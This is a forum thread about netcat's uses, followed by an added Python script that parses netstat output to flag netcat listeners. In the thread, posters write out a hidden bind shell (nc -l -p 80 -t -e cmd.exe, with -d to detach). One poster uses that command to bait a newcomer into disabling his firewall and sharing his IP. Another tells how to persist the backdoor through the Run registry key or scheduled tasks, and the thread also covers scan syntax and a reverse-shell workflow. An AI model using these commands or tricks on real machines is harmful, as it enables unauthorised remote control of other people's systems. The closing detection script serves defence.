Netcat: How useful can it be?

I'm not sure what netcat is tbh, but we can't help you if you're intending to do some damage with it.
 
just wondering if anyone knows how to do any harm in this little program

As much harm or use as injecting raw data to anything can be.

EDIT: Type this
nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP
 
just wondering if anyone knows how to do any harm in this little program

Cause harm? Why would you want to do that? Are your brains in your ass? Just for the record, I know how to run and use netcat very well. I love this little application ;) I run and use it on my Windows XP Pro. It's good for creating back doors (on systems you already breached) and for bypassing packet filtering programs.

You can use the following syntax:

nc -v -w 2 -z IP_Address port_range/port_number

nc -v -n IP_Address port

nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP


The command above by dj-chris simply opens a netcat listener on port 80, runs it in the background so a user will not see it on the console, and then executes cmd.exe, aka the command prompt. If he were to connect to the system on port 80 he would have obtained a command prompt.

Let me guess: you're telling him to open netcat (nc) and have it -l (listen) on -p (port 80); the -e switch is for the inbound program to execute, in this case the command prompt, aka cmd.exe.

Even if he did turn off his firewall and gave you his WAN IP address you still wouldn't be able to get this to work. ;) However, if he used FPIPE with NETCAT then this theory would work. Quite well, actually.

If I were you, DJ-CHRIS, I would just create a batch file and use nc -l -p 80 myipaddress -d -e cmd.exe. To get the batch file to execute you can always copy it into the startup group and set it to run on the reg key HKLM\CCS\SOFTWARE\MICROSOFT\WINDOWS\RUN, or you can always use the scheduled service; either way works.


As far as port redirection goes, use FPIPE. FPIPE with Netcat can do some pretty neat things. Just my two cents.
 
Let me guess: you're telling him to open netcat (nc) and have it -l (listen) on -p (port 80); the -e switch is for the inbound program to execute, in this case the command prompt, aka cmd.exe.

Even if he did turn off his firewall and gave you his WAN IP address you still wouldn't be able to get this to work. ;) However, if he used FPIPE with NETCAT then this theory would work. Quite well, actually.

As long as he didn't have a router it would work quite nicely without fpipe :)
 
EDIT: Type this
nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP


Again, all this is doing is telling netcat (nc) to (-l) listen on (-p) port 80; -t tells nc to accept telnet connections; -e executes cmd.exe, or the command prompt. When telnet connects to port 80 it will bring up a command prompt for you. Where's the -d option? ;)

-d tells netcat to detach (don't open up a window on the computer when listening)

nc - ran netcat
-L - tells netcat to stay open and listen (set up a backdoor)
-p 80 - tells netcat when listening to listen on port 80 (you could change 80 to whatever other port you choose)
-t - tells netcat to accept telnet connections
-e cmd.exe - tells netcat to open up cmd.exe (the command shell).


As long as he didn't have a router it would work quite nicely without fpipe.

This only works when the target doesn't allow *incoming* connections but does allow outgoing connections. ICF allows outgoing connections since it doesn't have any outbound security, for XP that is.

Also, ANY type of security on his system would notify him of an incoming connection to his PC. Hell, netstat -b would inform him. He could easily match the PID to the foreign address (remote address) and the port it's using. LOL. ;)

As far as hacking goes: have netcat listening on a certain port, fire my exploit at the target, and the target connects back to my netcat, giving me a command prompt. You can use this when the target doesn't allow incoming connections but does allow outgoing connections.
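As an added example (not part of this thread or of netcat itself), here is a small Python script in the spirit of the netstat -b check mentioned above: it parses netstat -ano style output together with a PID-to-image map (as tasklist would give it), flags listeners and established sessions owned by a netcat binary, and pairs each PID with the foreign address and port it is talking to. The sample netstat output, the PIDs and the process names are constructed for the example, not captured from any real host, and the set of suspect image names is an assumption you would tune to your own environment.

```python
import re
from collections import namedtuple

# Constructed sample of `netstat -ano` output (not from a real host).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       1532
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       900
  TCP    192.168.1.20:80        203.0.113.7:51042      ESTABLISHED     1532
  TCP    192.168.1.20:49200     198.51.100.9:443       ESTABLISHED     2210
  UDP    0.0.0.0:500            *:*                                    1100
"""

# Constructed PID -> image name map, as `tasklist` would report it.
SAMPLE_TASKLIST = {
    1532: "nc.exe",
    900: "svchost.exe",
    2210: "firefox.exe",
    1100: "lsass.exe",
}

# Assumed list of netcat-style binaries worth flagging; adjust to taste.
SUSPECT_IMAGES = {"nc.exe", "netcat.exe", "ncat.exe"}

Conn = namedtuple("Conn", "proto local foreign state pid")

# One netstat row: proto, local, foreign, optional state (UDP has none), PID.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+(?:(\S+)\s+)?(\d+)\s*$")


def parse_netstat(text):
    """Turn netstat -ano output into Conn records, skipping headers."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            proto, local, foreign, state, pid = m.groups()
            conns.append(Conn(proto, local, foreign, state or "", int(pid)))
    return conns


def split_addr(addr):
    """Split 'host:port' on the last colon so bracketed IPv6 still works."""
    host, _, port = addr.rpartition(":")
    return host, port


def find_suspicious(conns, pid_to_image):
    """Report sockets owned by a netcat image, with the peer they are bound to."""
    findings = []
    for c in conns:
        image = pid_to_image.get(c.pid, "?").lower()
        if image not in SUSPECT_IMAGES:
            continue
        if c.state == "LISTENING":
            _, port = split_addr(c.local)
            findings.append((c.pid, image, "listener on port %s" % port))
        elif c.state == "ESTABLISHED":
            host, port = split_addr(c.foreign)
            findings.append((c.pid, image, "established session with %s:%s" % (host, port)))
    return findings


if __name__ == "__main__":
    for pid, image, what in find_suspicious(parse_netstat(SAMPLE_NETSTAT), SAMPLE_TASKLIST):
        print("PID %d (%s): %s" % (pid, image, what))
```

On a live box you would feed the script the real output of netstat -ano and a PID map built from tasklist; the listener line alone tells you a netcat is bound to port 80, and the ESTABLISHED line tells you who is currently connected to it.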
 